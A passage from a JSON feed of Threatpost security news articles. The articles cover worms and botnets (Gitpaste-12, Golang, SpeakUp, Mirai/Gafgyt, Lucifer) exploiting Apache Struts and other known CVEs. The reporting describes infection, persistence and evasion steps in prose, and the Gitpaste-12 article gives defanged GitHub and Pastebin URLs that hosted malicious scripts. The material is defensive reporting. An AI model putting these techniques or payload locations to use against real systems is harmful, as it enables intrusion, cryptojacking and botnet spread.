companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-06T17:40:51", "description": "Researchers have uncovered a new worm targeting Linux based x86 servers, as well as Linux internet of things (IoT) devices (that are based on ARM and MIPS CPUs).\n\nOf note, the malware utilizes GitHub and Pastebin for housing malicious component code, and has at least 12 different attack modules available \u2013 leading researchers to call it \u201cGitpaste-12.\u201d It was first detected by Juniper Threat Labs in attacks on Oct. 15, 2020.\n\n\u201cNo malware is good to have, but worms are particularly annoying,\u201d said researchers with Juniper Threat Labs [in a Thursday post](<https://blogs.juniper.net/en-us/threat-research/gitpaste-12>). \u201cTheir ability to [spread in an automated fashion](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>) can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe first phase of the attack is the initial system compromise. The malware\u2019s various attack modules include 11 previously-disclosed vulnerabilities. That includes flaws in [Apache Struts (CVE-2017-5638),](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) Asus routers (CVE-2013-5948), Webadmin plugin for opendreambox (CVE-2017-14135) and [Tenda routers (CVE-2020-10987).](<https://threatpost.com/tenda-router-zero-days-spyware-botnet/159834/>)\n\nThe malware will attempt to use known exploits for these flaws to compromise systems and may also attempt to brute force passwords, said researchers. After compromising a system, a main shell script is then uploaded to the victim machine, and starts to download and execute other components of Gitpaste-12.\n\n## **The Malware **\n\nThis script sets up a cron job it downloads from Pastebin. A cron job is a time-based job scheduler in Unix-like computer operating systems. The cron job calls a script and executes it again each minute; researchers believe that this script is presumably one mechanism by which updates can be pushed to the botnet.\n\nIt then downloads a script from GitHub (https://raw[.]githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it. The script contains comments in the Chinese language and has multiple commands available to attackers to disable different security capabilities. These include stripping the system\u2019s defenses, including firewall rules, selinux (a security architecture for LinuxR systems), apparmor (a Linux kernel security module that allows the system administrator to restrict programs\u2019 capabilities), as well as common attack prevention and monitoring software.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/06121832/gitpaste.png>)\n\nThe 11 vulnerabilities utilized for Gitpaste-12\u2019s initial attack vectors. Credit: Juniper Labs\n\nThe malware also has some commands that disable cloud security agents, \u201cwhich clearly indicates the threat actor intends to target public cloud computing infrastructure provided by Alibaba Cloud and Tencent,\u201d said researchers.\n\nGitpaste-12 also features commands allowing it to run a cryptominer that targets the Monero cryptocurrency.\n\n\u201cIt also prevents administrators from collecting information about running processes by intercepting \u2018readdir\u2019 system calls and skip directories for processes like tcpdump, sudo, openssl, etc. in \u2018/proc\u2019,\u201d said researchers. \u201cThe \u2018/proc\u2019 directory in Linux contains information about running processes. It is used, for example, by the \u2018ps\u2019 command to show information about running processes. But unfortunately for this threat actor, this implementation does not do what they expect it to do.\u201d\n\nFinally, the malware also contains a library (hide.so) that is loaded as LD_PRELOAD, which downloads and executes Pastebin files )https://pastebin[.]com/raw/Tg5FQHhf) that host further malicious code.\n\nResearchers said they reported the Pastebin URL, as well as the Git repo mentioned above that downloads malicious scripts for the malware. The Git repo was closed on Oct. 30, 2020. \u201cThis should stop the proliferation of this botnet,\u201d said researchers.\n\n## **Wormable Features**\n\nIn terms of its worming capabilities, Gitpaste-12 also contains a script that launches attacks against other machines, in an attempt to replicate and spread the malware.\n\n\u201cThe malware chooses a random /8 CIDR for attack and will try all addresses within that range,\u201d according to researchers. Classless Inter-Domain Routing (CIDR) is a method for allocating IP addresses and for IP routing \u2013 meaning that the attack targets all IP addresses within the random CIDR\u2019s range.\n\nAnother version of the script also opens ports 30004 and 30005 for reverse shell commands, said researchers. Port 30004 uses the Transmission Control Protocol (TCP), which is one of the main protocols in TCP/IP networks; while port 30005 is a bidirectional SOAP/HTTP-based protocol, which provides communication between devices like routers or network switches, and auto-configuration servers.\n\nWorms can have a widespread impact, [as seen in a 2019 campaign](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>) that exploited a vulnerability in the Exim mail transport agent (MTA) to gain remote command-execution on victims\u2019 Linux systems, using a wormable exploit. Researchers said that currently more than 3.5 million servers were at risk from the attacks.\n\nSeveral new worms have popped up in 2020 so far, [including the Golang worm](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>), which is aimed at installing cryptominers, and recently changed up its tactics to add attacks on Windows servers and a new pool of exploits to its bag of tricks.\n\nIn August,[ a cryptomining worm](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) from the group known as TeamTNT was found spreading through the Amazon Web Services (AWS) cloud and collecting credentials. Once the logins are harvested, the malware logs in and deploys the XMRig mining tool to mine Monero cryptocurrency.\n\n**Hackers Put Bullseye on Healthcare: **[**On Nov. 18 at 2 p.m. EDT**](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)** find out why hospitals are getting hammered by ransomware attacks in 2020. **[**Save your spot for this FREE webinar**](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)** on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this **[**LIVE**](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)**, limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-06T17:34:00", "type": "threatpost", "title": "Gitpaste-12 Worm Targets Linux Servers, IoT Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5948", "CVE-2017-14135", "CVE-2017-5638", "CVE-2020-10987"], "modified": "2020-11-06T17:34:00", "id": "THREATPOST:7B2EAFA107D335014D553D78946C453E", "href": "https://threatpost.com/gitpaste-12-worm-linux-servers-iot-devices/161016/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing &amp; Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:27", "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but now has spread to Windows and other servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201c; and CVE-2018-20062 for the ThinkPHP framework.\n\nOther exploits that don\u2019t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. \u201cAs in other families of malwares, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others as the functions imported from other libraries are compiled in the binary itself. It also has a unique way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader pacyload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.\n\nOut of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file meanwhile is the malware\u2019s worm propagation mechanism. It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Theatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-25T18:30:59", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "modified": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-04T07:14:14", "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and, it doesn\u2019t stop at Linux: It also has the ability to infect MacOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. And, he said that since these software can be deployed on virtual servers, all cloud infrastructure are also prone to be affected.\n\nThe actual trojan itself can affect all Linux distributions and MacOS.\n\n## Infection Routine\n\nThe initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nAfter registering the victim machine with the C2, Check Point analysts found that SpeakUp continuously asks for new tasks on a fixed-interval basis of every three seconds. The C2 can say \u201cno task\u201d \u2013 or, it can tell it to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt exploit further using new techniques. If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign would be immediately scaled as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords; and scanning the network environment of the infected machine. For the latter function, it checks for availability of specific ports on servers that share the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; a Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate.png>)\n\nSpeakUp\u2019s daily infection rate (click to enlarge)\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. According to [XMRHunter,](<https://www.xmrhunter.com/>) the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT.png>)\n\nSpeakUp has no detections in VirusTotal.\n\nThe initial victims have in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. \u201cNot only this was highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and Github projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of time in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers. _\n", "cvss3": {}, "published": "2019-02-04T14:00:15", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2016-3088", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-2894"], "modified": "2019-02-04T14:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:51:10", "description": "Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday ](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>)post.\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack.\n\nThough a patch has been available for over a year now, many consumers may not have updated their systems \u2013 an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August \u2014 an IP address hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) exists in the lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it then fetches an update from &lt;HTTP_SERVER&gt;, saves it to &lt;FILE_LOCATION&gt;, and installs the update. After that, the botnet launches a Blacknurse DDoS attack, an attack that involves ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Ruchna told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of new targeted vuln comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "cvss3": {}, "published": "2018-09-10T14:23:09", "type": "threatpost", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"], "modified": "2018-09-10T14:23:09", "id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:40:45", "description": "Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nThe never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an \u201cexhaustive\u201d list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.\n\n\u201cLucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team, on[ Wednesday in a blog post](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>). \u201cApplying the updates and patches to the affected software are strongly advised.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle Weblogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE 